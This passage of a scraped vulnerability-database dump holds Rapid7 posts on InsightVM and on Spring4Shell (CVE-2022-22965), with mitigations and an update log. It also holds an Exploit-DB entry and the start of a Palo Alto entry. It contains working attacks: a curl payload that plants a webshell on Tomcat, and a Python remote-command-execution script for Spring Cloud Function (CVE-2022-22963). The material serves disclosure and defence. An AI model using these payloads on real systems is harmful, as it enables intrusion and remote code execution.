VDI is a prime target for bad actors trying to access customer environments, due in part to its multiple entry points; once a hacker gains entry, it\u2019s fairly easy for them to jump into a company\u2019s servers and critical files. By providing recurring coverage for both the VMware server and client, Rapid7 gives customers broad coverage of this particular risk profile. \n\n## [InsightVM]\u200b\u200b Remediation Projects\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). We\u2019re excited to announce a few updates to this feature:\n\n### Better way to track progress for projects\n\nThe InsightVM team has updated the metric that calculates progress for Remediation Projects. The new metric will advance for each individual asset remediated within a \u201csolution\u201d group. Yes, this means customers no longer have to wait for all the affected assets to be remediated to see progress. Security teams can thus have meaningful discussions about progress with assigned remediators or upper management. [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Remediator Export\n\nWe added a new and much requested solution-based CSV export option to Remediation Projects. Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution. This update makes it easy and quick for the Security teams to share relevant data with the Remediation team. It also gives remediators all of the information they need. We call this a win-win for both teams! [Learn more](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>).\n\n### Project search bar for Projects\n\nOur team has added a search bar on the Remediation Projects page. 
This highly requested feature empowers customers to easily locate a project instead of having to scroll down the entire list.\n\n\n\n_**Additional reading:**_\n\n * _[InsightVM Release Update: Let\u2019s Focus on Remediation for Just a Minute](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>)_\n * _[How to Build and Enable a Cyber Target Operating Model](<https://www.rapid7.com/blog/post/2022/07/08/how-to-build-and-enable-a-cyber-target-operating-model/>)_\n * _[The Hidden Harm of Silent Patches](<https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>)_\n * _[Maximize Your VM Investment: Fix Vulnerabilities Faster With Automox + Rapid7](<https://www.rapid7.com/blog/post/2022/05/16/maximize-your-vm-investment-fix-vulnerabilities-faster-with-automox-rapid7/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-28T14:00:00", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-07-28T14:00:00", "id": "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "href": "https://blog.rapid7.com/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. 
CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. 
tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. 
This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. 
The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. 
It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. 
The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n 
println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014, that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u200b\u200b\u2026there are potential security implications in failing to set an array of allowed fields. 
In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 & 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. 
To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2022 - 9PM EDT\n\nThe situation continues to evolve, but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim, for organizations that have large deployments of the core Spring Framework or use it in business-critical applications, we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere: for organizations that have WAF technology, string filters on the request-parameter patterns "class.*", "Class.*", "*.class.*", and "*.Class.*" offer an effective deterrent. These should be tested prior to production deployment and treated as a stopgap rather than a replacement for upgrading, but they are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns, in this case any binding path containing \u201cclass\u201d. Praetorian's example is provided below. 
The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{"class.*", "Class.*", "*.class.*", "*.Class.*"}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\nNote that this advice applies globally, but a controller that declares its own @InitBinder method and calls setDisallowedFields locally overrides the global setting; such controllers must apply the same denylist themselves, and the patterns must be kept in both lower- and upper-case forms as shown.\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. 
An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). 
At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. 
More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. 
A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. 
Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": 
"RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-09-28T03:34:13", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-11T00:00:00", "type": "exploitdb", "title": "Spring Cloud 3.2.2 - Remote Command Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-22963", "CVE-2022-22963"], "modified": "2023-07-11T00:00:00", "id": "EDB-ID:51577", "href": "https://www.exploit-db.com/exploits/51577", "sourceData": "# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)\r\n# Date: 07/07/2023\r\n# Exploit Author: GatoGamer1155, 0bfxgh0st\r\n# Vendor Homepage: https://spring.io/projects/spring-cloud-function/\r\n# Description: Exploit to execute commands exploiting CVE-2022-22963\r\n# Software Link: https://spring.io/projects/spring-cloud-function\r\n# CVE: CVE-2022-22963\r\n\r\nimport requests, argparse, json\r\n\r\nparser = 
argparse.ArgumentParser()\r\nparser.add_argument(\"--url\", type=str, help=\"http://172.17.0.2:8080/functionRouter\", required=True)\r\nparser.add_argument(\"--command\", type=str, help=\"ping -c1 172.17.0.1\", required=True)\r\nargs = parser.parse_args()\r\n\r\nprint(\"\\n\\033[0;37m[\\033[0;33m!\\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\\n\")\r\n\r\nheaders = {\"spring.cloud.function.routing-expression\": 'T(java.lang.Runtime).getRuntime().exec(\"%s\")' % args.command }\r\ndata = {\"data\": \"\"}\r\n\r\nrequest = requests.post(args.url, data=data, headers=headers)\r\nresponse = json.dumps(json.loads(request.text), indent=2)\r\nprint(response)", "sourceHref": "https://www.exploit-db.com/raw/51577", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2023-07-21T18:40:25", "description": "The Palo Alto Networks Product Security Assurance team has completed its evaluation of the Spring Cloud Function vulnerability CVE-2022-22963 and Spring Core vulnerability CVE-2022-22965 for all products and services. 
